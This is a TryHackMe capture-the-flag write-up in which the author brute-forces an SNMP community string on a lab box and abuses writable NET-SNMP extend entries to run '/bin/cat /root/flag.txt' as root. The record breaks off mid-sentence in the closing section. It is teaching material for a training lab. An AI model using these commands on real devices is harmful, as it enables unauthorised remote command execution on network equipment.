Operation Takeover TryHackMe Writeup

1019 words

5 minutes

Operation Takeover TryHackMe Writeup

2026-04-11

TryHackMe

/

SNMP

/

Linux

/

Enumeration

/

Writeup

We are back with another TryHackMe room, this time called Operation Takeover.

After connecting to the VPN and starting the target machine, we begin with basic enumeration.

Nmap Scan#

As usual, the first step is to scan the target and look for open TCP ports:

1
┌──(cat0x01㉿cat0x01)-[~]
2
└─$ nmap -sV -sC 10.130.149.91 -p-
3
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-11 05:24 EDT
4
Stats: 0:08:33 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
5
SYN Stealth Scan Timing: About 99.78% done; ETC: 05:33 (0:00:01 remaining)
6
Nmap scan report for 10.130.149.91
7
Host is up (2.1s latency).
8
Not shown: 65532 closed tcp ports (reset)
9
PORT     STATE SERVICE    VERSION
10
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
11
| ssh-hostkey:
12
|   3072 68:f0:08:23:1a:ff:4f:35:a3:32:48:f3:55:f6:a1:ea (RSA)
13
|   256 0e:58:b0:75:db:ed:74:e8:6d:97:43:fb:0c:14:c6:36 (ECDSA)
14
|_  256 45:33:fb:1d:8c:29:78:c9:e1:ec:25:5a:69:63:cf:b3 (ED25519)
15
179/tcp  open  tcpwrapped
16
2623/tcp open  lmdp?
17
| fingerprint-strings:
18
|   DNSStatusRequestTCP, GenericLines, GetRequest, NULL, RPCCheck:
19
|     Hello, this is FRRouting (version 10.0).
20
|     Copyright 1996-2005 Kunihiro Ishiguro, et al.
21
|     User Access Verification
22
|     Password:
23
|   DNSVersionBindReqTCP:
24
|     Hello, this is FRRouting (version 10.0).
25
|     Copyright 1996-2005 Kunihiro Ishiguro, et al.
26
|     User Access Verification
27
|     Password:
28
|     Password:
29
|   HTTPOptions, RTSPRequest:
30
|     Hello, this is FRRouting (version 10.0).
31
|     Copyright 1996-2005 Kunihiro Ishiguro, et al.
32
|     User Access Verification
33
|     Password:
34
|     Password:
35
|_    Password:
36
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
37
SF-Port2623-TCP:V=7.95%I=7%D=4/11%Time=69DA1567%P=x86_64-pc-linux-gnu%r(NU
38
SF:LL,91,"\r\nHello,\x20this\x20is\x20FRRouting\x20\(version\x2010\.0\)\.\
39
SF:r\nCopyright\x201996-2005\x20Kunihiro\x20Ishiguro,\x20et\x20al\.\r\n\r\
40
SF:n\r\nUser\x20Access\x20Verification\r\n\r\n\xff\xfb\x01\xff\xfb\x03\xff
41
SF:\xfe\"\xff\xfd\x1fPassword:\x20")%r(GenericLines,91,"\r\nHello,\x20this
42
SF:\x20is\x20FRRouting\x20\(version\x2010\.0\)\.\r\nCopyright\x201996-2005
43
SF:\x20Kunihiro\x20Ishiguro,\x20et\x20al\.\r\n\r\n\r\nUser\x20Access\x20Ve
44
SF:rification\r\n\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfe\"\xff\xfd\x1fPasswor
45
SF:d:\x20")%r(GetRequest,91,"\r\nHello,\x20this\x20is\x20FRRouting\x20\(ve
46
SF:rsion\x2010\.0\)\.\r\nCopyright\x201996-2005\x20Kunihiro\x20Ishiguro,\x
47
SF:20et\x20al\.\r\n\r\n\r\nUser\x20Access\x20Verification\r\n\r\n\xff\xfb\
48
SF:x01\xff\xfb\x03\xff\xfe\"\xff\xfd\x1fPassword:\x20")%r(HTTPOptions,A9,"
49
SF:\r\nHello,\x20this\x20is\x20FRRouting\x20\(version\x2010\.0\)\.\r\nCopy
50
SF:right\x201996-2005\x20Kunihiro\x20Ishiguro,\x20et\x20al\.\r\n\r\n\r\nUs
51
SF:er\x20Access\x20Verification\r\n\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfe\"\
52
SF:xff\xfd\x1fPassword:\x20\r\nPassword:\x20\r\nPassword:\x20")%r(RTSPRequ
53
SF:est,A9,"\r\nHello,\x20this\x20is\x20FRRouting\x20\(version\x2010\.0\)\.
54
SF:\r\nCopyright\x201996-2005\x20Kunihiro\x20Ishiguro,\x20et\x20al\.\r\n\r
55
SF:\n\r\nUser\x20Access\x20Verification\r\n\r\n\xff\xfb\x01\xff\xfb\x03\xf
56
SF:f\xfe\"\xff\xfd\x1fPassword:\x20\r\nPassword:\x20\r\nPassword:\x20")%r(
57
SF:RPCCheck,91,"\r\nHello,\x20this\x20is\x20FRRouting\x20\(version\x2010\.
58
SF:0\)\.\r\nCopyright\x201996-2005\x20Kunihiro\x20Ishiguro,\x20et\x20al\.\
59
SF:r\n\r\n\r\nUser\x20Access\x20Verification\r\n\r\n\xff\xfb\x01\xff\xfb\x
60
SF:03\xff\xfe\"\xff\xfd\x1fPassword:\x20")%r(DNSVersionBindReqTCP,9D,"\r\n
61
SF:Hello,\x20this\x20is\x20FRRouting\x20\(version\x2010\.0\)\.\r\nCopyrigh
62
SF:t\x201996-2005\x20Kunihiro\x20Ishiguro,\x20et\x20al\.\r\n\r\n\r\nUser\x
63
SF:20Access\x20Verification\r\n\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfe\"\xff\
64
SF:xfd\x1fPassword:\x20\r\nPassword:\x20")%r(DNSStatusRequestTCP,91,"\r\nH
65
SF:ello,\x20this\x20is\x20FRRouting\x20\(version\x2010\.0\)\.\r\nCopyright
66
SF:\x201996-2005\x20Kunihiro\x20Ishiguro,\x20et\x20al\.\r\n\r\n\r\nUser\x2
67
SF:0Access\x20Verification\r\n\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfe\"\xff\x
68
SF:fd\x1fPassword:\x20");
69
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
70

71
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
72
Nmap done: 1 IP address (1 host up) scanned in 709.46 seconds

The scan shows three open TCP ports :

22/tcp running OpenSSH
179/tcp used for BGP
2623/tcp exposing an FRRouting management interface

One important correction here : port 2623 is not really lmdp in this case.
Based on the service banner it is an FRRouting VTY interface, which is used for remote router management and configuration

The output from Nmap already gives us a useful clue :

1
Hello, this is FRRouting (version 10.0).
2
User Access Verification
3
Password:

This suggests that the box is related to routing services but we still do not have valid credentials

Testing Port 2623#

We can connect to port 2623 manually with netcat:

1
nc 10.130.149.91 2623

The service asks for a password immediately After a few failed attempts it blocks us with :

1
% Bad passwords, too many failures!

So brute forcing this service is not the best path forward, especially since we only see a few TCP services and none of them give us direct access yet.

UDP Scan#

At this point, checking only TCP is not enough, so the next good step is to scan UDP ports:

1
┌──(cat0x01㉿cat0x01)-[~]
2
└─$ nmap -sU 10.130.149.91 -T5
3
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-11 06:46 EDT
4
Warning: 10.130.149.91 giving up on port because retransmission cap hit (2).
5
Stats: 0:01:38 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
6
UDP Scan Timing: About 37.93% done; ETC: 06:50 (0:02:39 remaining)
7
Stats: 0:08:05 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
8
UDP Scan Timing: About 73.63% done; ETC: 06:57 (0:02:53 remaining)
9
Nmap scan report for 10.130.149.91
10
Host is up (0.063s latency).
11
Not shown: 737 closed udp ports (port-unreach), 262 open|filtered udp ports (no-response)
12
PORT    STATE SERVICE
13
161/udp open  snmp
14

15
Nmap done: 1 IP address (1 host up) scanned in 797.96 seconds

This scan reveals an important service :

1
161/udp open  snmp

That changes the whole direction of the room SNMP is often misconfigured and can leak a lot of useful information

SNMP Enumeration#

We start with the default public community string :

1
snmpwalk -v2c -c public 10.130.149.91

But the server does not respond :

1
Timeout: No Response from 10.130.149.91

Here it is important to use the correct term: in SNMPv2c, public is not a username.
It is a community string, which works like a weak shared password

So instead of guessing usernames we need to discover the correct community string

Finding the Community String#

We can use onesixtyone for SNMP community string enumeration :

1
onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt 10.130.149.91

The result gives us the valid community string :

1
10.130.149.91 [pr1v4t3] Linux e42ceec45c86 5.15.0-1075-aws #82~20.04.1-Ubuntu SMP Thu Dec 19 05:24:09 UTC 2024 x86_64

Now we can enumerate SNMP properly :

1
snmpwalk -v2c -c pr1v4t3 10.130.149.91

Interesting SNMP Data#

The snmpwalk output gives a lot of useful information, including:

System details and kernel version
The hostname
Mounted paths such as /etc/hosts, /etc/hostname, and /etc/resolv.conf
Running processes like snmpd, snmptrapd, and supervisord

Some interesting parts look like this:

1
iso.3.6.1.2.1.1.4.0 = STRING: "Root <root@localhost> (configure /etc/snmp/snmp.local.conf)"
2
iso.3.6.1.2.1.25.4.2.1.4.11 = STRING: "/usr/sbin/snmpd"
3
iso.3.6.1.2.1.25.4.2.1.5.9 = STRING: "-CdfLf trap.log --disableAuthorization=yes"

We can also verify that write access is allowed through SNMP by changing the hostname :

1
snmpset -v2c -c pr1v4t3 10.130.149.91 .1.3.6.1.2.1.1.5.0 s "hacked"

If that works it means the SNMP service is not just readable it is also writable which is a serious misconfiguration

From Writable SNMP to Command Execution#

At this stage the key idea is to check whether the box exposes the NET-SNMP-EXTEND-MIB feature

This feature allows administrators to define commands that can be executed by SNMP and then read their output remotely If write access is enabled we can create our own extend entry and run a command on the target

In this room we use that feature to run :

1
/bin/cat /root/flag.txt

The following snmpset command creates an extend entry called cat:

1
snmpset -v2c -c pr1v4t3 10.130.149.91 \
2
'1.3.6.1.4.1.8072.1.3.2.2.1.21.3.99.97.116' i 4 \
3
'1.3.6.1.4.1.8072.1.3.2.2.1.2.3.99.97.116' s "/bin/cat" \
4
'1.3.6.1.4.1.8072.1.3.2.2.1.3.3.99.97.116' s "/root/flag.txt"

In simple terms this does the following:

creates a new SNMP extend entry
sets the command to /bin/cat
passes /root/flag.txt as the argument

After that we read the command output with snmpwalk:

1
snmpwalk -v2c -c pr1v4t3 10.130.149.91 1.3.6.1.4.1.8072.1.3.2.4.1.2.3.99.97.116

The command output contains the root flag, which confirms successful remote command execution through SNMP

Why This Worked#

This room is a good example of why UDP enumeration matters.

At first, the TCP services looked limited:

SSH was closed to us because we had no credentials
FRRouting on port 2623 required a password and rate-limited failed attempts
BGP on port 179 was not directly useful

But once we scanned UDP, we found SNMP on port 161.
That service exposed a writable configuration with the community string pr1v4t3 and that was enough to :